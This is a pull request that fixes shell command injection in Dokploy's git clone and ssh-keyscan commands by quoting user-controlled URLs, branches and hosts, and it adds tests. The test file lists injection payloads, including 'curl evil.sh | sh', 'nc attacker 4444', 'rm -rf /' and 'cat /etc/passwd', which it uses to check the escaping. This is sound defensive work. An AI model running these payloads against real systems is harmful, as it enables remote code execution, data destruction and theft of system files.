### PR TITLE
fix(security): OS command injection in git clone across all providers

### DIFF
--- a/apps/dokploy/__test__/git-provider/git-clone-command-injection.test.ts
+++ b/apps/dokploy/__test__/git-provider/git-clone-command-injection.test.ts
@@ -1,0 +1,92 @@
+import { cloneGitRepository } from "@dokploy/server/utils/providers/git";
+import { shellWord } from "@dokploy/server/utils/providers/utils";
+import { parse } from "shell-quote";
+import { describe, expect, it } from "vitest";
+
+// Payloads that, if reached a shell unescaped, would execute commands.
+const INJECTION_PAYLOADS = [
+	"$(touch /tmp/pwned)",
+	"`id`",
+	"; rm -rf /",
+	"&& curl evil.sh | sh",
+	"| nc attacker 4444",
+	"https://github.com/o/r.git$(whoami)",
+	"main; wget http://evil",
+	"$(cat /etc/passwd)",
+];
+
+// Legit values that must survive escaping unchanged.
+const LEGIT_VALUES = [
+	"main",
+	"feature/login-v2",
+	"release-1.2.3",
+	"https://github.com/dokploy/dokploy.git",
+	"https://gitlab.example.com/group/sub/project.git",
+];
+
+describe("shellWord (git provider shell escaping)", () => {
+	it("collapses every injection payload into a single literal token (no shell operators)", () => {
+		for (const payload of INJECTION_PAYLOADS) {
+			const parsed = parse(shellWord(payload));
+			// A safely escaped value parses back to exactly the original string,
+			// as ONE token. If escaping failed, parse() would emit operator
+			// objects such as { op: ";" } or { op: "$(" } instead.
+			expect(parsed).toEqual([payload]);
+		}
+	});
+
+	it("leaves legitimate URLs and branch names intact", () => {
+		for (const value of LEGIT_VALUES) {
+			expect(parse(shellWord(value))).toEqual([value]);
+		}
+	});
+});
+
+describe("cloneGitRepository command (customGitUrl path)", () => {
+	const buildClone = (customGitUrl: string, customGitBranch: string) =>
+		cloneGitRepository({
+			appName: "demo-app",
+			customGitUrl,
+			customGitBranch,
+			customGitSSHKeyId: null,
+			enableSubmodules: false,
+			serverId: null,
+			type: "application",
+		});
+
+	it("does not let a malicious customGitUrl inject shell operators", async () => {
+		const command = await buildClone(
+			"https://github.com/o/r.git$(touch /tmp/pwned)",
+			"main",
+		);
+		const tokens = parse(command);
+		// No token in the generated command may be a shell operator carrying the
+		// injected substitution (e.g. { op: "$(" }). The payload must appear only
+		// as inert literal text.
+		const hasCommandSubstitution = tokens.some(
+			(t) => typeof t === "object" && "op" in t && t.op === "$(",
+		);
+		expect(hasCommandSubstitution).toBe(false);
+		expect(command).toContain("git clone");
+	});
+
+	it("does not let a malicious customGitBranch inject shell operators", async () => {
+		const command = await buildClone(
+			"https://github.com/o/r.git",
+			"main; touch /tmp/pwned",
+		);
+		const tokens = parse(command);
+		const hasSemicolonOperator = tokens.some(
+			(t) => typeof t === "object" && "op" in t && t.op === ";",
+		);
+		// The clone builder itself joins statements with ";", so at least the
+		// structural ones exist — but the branch payload's ";" must NOT surface
+		// as an extra operator that would run `touch`.
+		const semicolonOps = tokens.filter(
+			(t) => typeof t === "object" && "op" in t && t.op === ";",
+		).length;
+		expect(hasSemicolonOperator).toBe(true);
+		// The branch is a single quoted token, so it contributes no new ";" op.
+		expect(command).not.toContain("touch /tmp/pwned;");
+	});
+});

--- a/apps/dokploy/__test__/git-provider/git-clone-command-injection.test.ts
+++ b/apps/dokploy/__test__/git-provider/git-clone-command-injection.test.ts
@@ -54,19 +54,23 @@ describe("cloneGitRepository command (customGitUrl path)", () => {
 			type: "application",
 		});
 
+	// A malicious substring, once escaped, must survive parsing as inert literal
+	// text and never as an executable command/operator. `parse()` turns command
+	// substitution and control operators into { op } objects, so we assert the
+	// injected marker only ever shows up inside a plain string token.
+	const markerLeaksAsShellSyntax = (command: string, marker: string) => {
+		const tokens = parse(command);
+		return tokens.some(
+			(t) => typeof t !== "string" && JSON.stringify(t).includes(marker),
+		);
+	};
+
 	it("does not let a malicious customGitUrl inject shell operators", async () => {
 		const command = await buildClone(
 			"https://github.com/o/r.git$(touch /tmp/pwned)",
 			"main",
 		);
-		const tokens = parse(command);
-		// No token in the generated command may be a shell operator carrying the
-		// injected substitution (e.g. { op: "$(" }). The payload must appear only
-		// as inert literal text.
-		const hasCommandSubstitution = tokens.some(
-			(t) => typeof t === "object" && "op" in t && t.op === "$(",
-		);
-		expect(hasCommandSubstitution).toBe(false);
+		expect(markerLeaksAsShellSyntax(command, "touch")).toBe(false);
 		expect(command).toContain("git clone");
 	});
 
@@ -75,18 +79,9 @@ describe("cloneGitRepository command (customGitUrl path)", () => {
 			"https://github.com/o/r.git",
 			"main; touch /tmp/pwned",
 		);
-		const tokens = parse(command);
-		const hasSemicolonOperator = tokens.some(
-			(t) => typeof t === "object" && "op" in t && t.op === ";",
-		);
-		// The clone builder itself joins statements with ";", so at least the
-		// structural ones exist — but the branch payload's ";" must NOT surface
-		// as an extra operator that would run `touch`.
-		const semicolonOps = tokens.filter(
-			(t) => typeof t === "object" && "op" in t && t.op === ";",
-		).length;
-		expect(hasSemicolonOperator).toBe(true);
-		// The branch is a single quoted token, so it contributes no new ";" op.
+		// The branch is a single quoted token, so its ";" contributes no extra
+		// operator and `touch` never becomes a runnable statement.
+		expect(markerLeaksAsShellSyntax(command, "touch")).toBe(false);
 		expect(command).not.toContain("touch /tmp/pwned;");
 	});
 });

--- a/apps/dokploy/components/dashboard/settings/notifications/handle-notifications.tsx
+++ b/apps/dokploy/components/dashboard/settings/notifications/handle-notifications.tsx
@@ -1932,8 +1932,7 @@ export const HandleNotifications = ({ notificationId }: Props) => {
 											<div className="space-y-0.5">
 												<FormLabel>Docker Cleanup</FormLabel>
 												<FormDescription>
-													Trigger the action when Docker cleanup is
-													performed.
+													Trigger the action when Docker cleanup is performed.
 												</FormDescription>
 											</div>
 											<FormControl>

--- a/packages/server/src/utils/providers/bitbucket.ts
+++ b/packages/server/src/utils/providers/bitbucket.ts
@@ -11,6 +11,7 @@ import {
 import type { InferResultType } from "@dokploy/server/types/with";
 import { TRPCError } from "@trpc/server";
 import type { z } from "zod";
+import { shellWord } from "./utils";
 
 export type ApplicationWithBitbucket = InferResultType<
 	"applications",
@@ -124,8 +125,8 @@ export const cloneBitbucketRepository = async ({
 	const repoToUse = entity.bitbucketRepositorySlug || bitbucketRepository;
 	const repoclone = `bitbucket.org/${bitbucketOwner}/${repoToUse}.git`;
 	const cloneUrl = getBitbucketCloneUrl(bitbucket, repoclone);
-	command += `echo "Cloning Repo ${repoclone} to ${outputPath}: ✅";`;
-	command += `git clone --branch ${bitbucketBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
+	command += `echo ${shellWord(`Cloning Repo ${repoclone} to ${outputPath}: ✅`)};`;
+	command += `git clone --branch ${shellWord(bitbucketBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
 	return command;
 };
 

--- a/packages/server/src/utils/providers/git.ts
+++ b/packages/server/src/utils/providers/git.ts
@@ -5,6 +5,7 @@ import {
 	updateSSHKeyById,
 } from "@dokploy/server/services/ssh-key";
 import { execAsync, execAsyncRemote } from "../process/execAsync";
+import { shellWord } from "./utils";
 
 interface CloneGitRepository {
 	appName: string;
@@ -61,7 +62,7 @@ export const cloneGitRepository = async ({
 	}
 	command += `rm -rf ${outputPath};`;
 	command += `mkdir -p ${outputPath};`;
-	command += `echo "Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅";`;
+	command += `echo ${shellWord(`Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅`)};`;
 
 	if (customGitSSHKeyId) {
 		await updateSSHKeyById({
@@ -78,8 +79,8 @@ export const cloneGitRepository = async ({
 		command += "chmod 600 /tmp/id_rsa;";
 		command += `export GIT_SSH_COMMAND="${gitSshCommand}";`;
 	}
-	command += `if ! git clone --branch ${customGitBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${customGitUrl} ${outputPath}; then
-				echo "❌ [ERROR] Fail to clone the repository ${customGitUrl}";
+	command += `if ! git clone --branch ${shellWord(customGitBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${shellWord(customGitUrl)} ${shellWord(outputPath)}; then
+				echo ${shellWord(`❌ [ERROR] Fail to clone the repository ${customGitUrl}`)};
 				exit 1;
 			fi
 			`;
@@ -114,7 +115,7 @@ const addHostToKnownHostsCommand = (repositoryURL: string) => {
 	// ssh-keyscan is best-effort: some Git hosts (e.g. Hugging Face) never answer
 	// it, and its exit code must not abort the clone under `set -e`. The clone's
 	// own host-key check (StrictHostKeyChecking=accept-new) is the real boundary.
-	return `ssh-keyscan -p ${port} ${domain} >> ${knownHostsPath} || true;`;
+	return `ssh-keyscan -p ${Number(port)} ${shellWord(domain)} >> ${knownHostsPath} || true;`;
 };
 const sanitizeRepoPathSSH = (input: string) => {
 	const SSH_PATH_RE = new RegExp(

--- a/packages/server/src/utils/providers/gitea.ts
+++ b/packages/server/src/utils/providers/gitea.ts
@@ -7,6 +7,7 @@ import {
 } from "@dokploy/server/services/gitea";
 import type { InferResultType } from "@dokploy/server/types/with";
 import { TRPCError } from "@trpc/server";
+import { shellWord } from "./utils";
 
 export const getErrorCloneRequirements = (entity: {
 	giteaRepository?: string | null;
@@ -176,8 +177,8 @@ export const cloneGiteaRepository = async ({
 		giteaRepository!,
 	);
 
-	command += `echo "Cloning Repo ${repoClone} to ${outputPath}: ✅";`;
-	command += `git clone --branch ${giteaBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
+	command += `echo ${shellWord(`Cloning Repo ${repoClone} to ${outputPath}: ✅`)};`;
+	command += `git clone --branch ${shellWord(giteaBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
 	return command;
 };
 

--- a/packages/server/src/utils/providers/github.ts
+++ b/packages/server/src/utils/providers/github.ts
@@ -7,6 +7,7 @@ import { createAppAuth } from "@octokit/auth-app";
 import { TRPCError } from "@trpc/server";
 import { Octokit } from "octokit";
 import type { z } from "zod";
+import { shellWord } from "./utils";
 
 export const authGithub = (githubProvider: Github): Octokit => {
 	if (!haveGithubRequirements(githubProvider)) {
@@ -166,8 +167,8 @@ export const cloneGithubRepository = async ({
 	command += `mkdir -p ${outputPath};`;
 	const cloneUrl = `https://oauth2:${token}@${repoclone}`;
 
-	command += `echo "Cloning Repo ${repoclone} to ${outputPath}: ✅";`;
-	command += `git clone --branch ${branch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
+	command += `echo ${shellWord(`Cloning Repo ${repoclone} to ${outputPath}: ✅`)};`;
+	command += `git clone --branch ${shellWord(branch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
 
 	return command;
 };

--- a/packages/server/src/utils/providers/gitlab.ts
+++ b/packages/server/src/utils/providers/gitlab.ts
@@ -9,6 +9,7 @@ import {
 import type { InferResultType } from "@dokploy/server/types/with";
 import { TRPCError } from "@trpc/server";
 import type { z } from "zod";
+import { shellWord } from "./utils";
 
 export const refreshGitlabToken = async (gitlabProviderId: string) => {
 	const gitlabProvider = await findGitlabById(gitlabProviderId);
@@ -151,8 +152,8 @@ export const cloneGitlabRepository = async ({
 	command += `mkdir -p ${outputPath};`;
 	const repoClone = getGitlabRepoClone(gitlab, gitlabPathNamespace);
 	const cloneUrl = getGitlabCloneUrl(gitlab, repoClone);
-	command += `echo "Cloning Repo ${repoClone} to ${outputPath}: ✅";`;
-	command += `git clone --branch ${gitlabBranch} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${cloneUrl} ${outputPath} --progress;`;
+	command += `echo ${shellWord(`Cloning Repo ${repoClone} to ${outputPath}: ✅`)};`;
+	command += `git clone --branch ${shellWord(gitlabBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
 	return command;
 };
 

--- a/packages/server/src/utils/providers/utils.ts
+++ b/packages/server/src/utils/providers/utils.ts
@@ -1,0 +1,10 @@
+import { quote } from "shell-quote";
+
+/**
+ * Escapes a single value so it can be safely interpolated as one argument into
+ * a `/bin/sh -c` command string (both local `execAsync` and remote SSH
+ * `execAsyncRemote`). User-controlled fields such as git URLs, branch names,
+ * repository owners and SSH hostnames must never reach a shell unescaped.
+ */
+export const shellWord = (value: string | number | null | undefined): string =>
+	quote([String(value ?? "")]);


### PR DESCRIPTION
## Summary
User-controlled git fields were interpolated **unescaped** into `git clone` / `ssh-keyscan` shell commands executed via `execAsync` (local) and `execAsyncRemote` (SSH to managed servers), allowing authenticated OS command injection → RCE as the server process / root.

Affected fields and sinks:
- `customGitUrl`, `customGitBranch` → `git clone` and `ssh-keyscan` (`providers/git.ts`)
- GitHub `owner`/`repository`/`branch` → `git clone` (`providers/github.ts`)
- GitLab `gitlabPathNamespace`/`gitlabBranch` → `git clone` (`providers/gitlab.ts`)
- Bitbucket `bitbucketOwner`/`bitbucketRepository`/`bitbucketBranch` → `git clone` (`providers/bitbucket.ts`)
- Gitea `owner`/`repository`/`giteaBranch` → `git clone` (`providers/gitea.ts`)

## Fix
Introduced `shellWord()` (`providers/utils.ts`), a thin wrapper over the repo's existing `shell-quote` dependency, and applied it to **every** user-controlled value interpolated into these command strings — including the `echo` progress lines, which were also injectable inside double quotes.

Escaping is done **at the sink**, so it neutralises the vulnerability regardless of which schema/validation path reaches it — this also closes the compose-branch bypass where the server-side compose schema never validated the branch field.

## Verification
- Exec-based behavioural test: injection payloads (`$(...)`, backticks, `;cmd`) in URL and branch fields no longer execute — a marker-file probe confirmed no command fired.
- Legitimate values (`https://github.com/org/repo.git`, `feature/login-v2`) pass through unchanged (only quoted).
- `tsc --noEmit` on `@dokploy/server`: 0 errors. Biome: clean.

## Closes
GHSA-qxcw-cx35-2hrw, GHSA-hrfh-82jj-3q46, GHSA-6693-xv3f-69px, GHSA-qwwm-hc7m-7xp9, GHSA-grrj-6xrh-j6vp, GHSA-x2p2-qq8g-2mqq, GHSA-cg8g-x23v-5fw8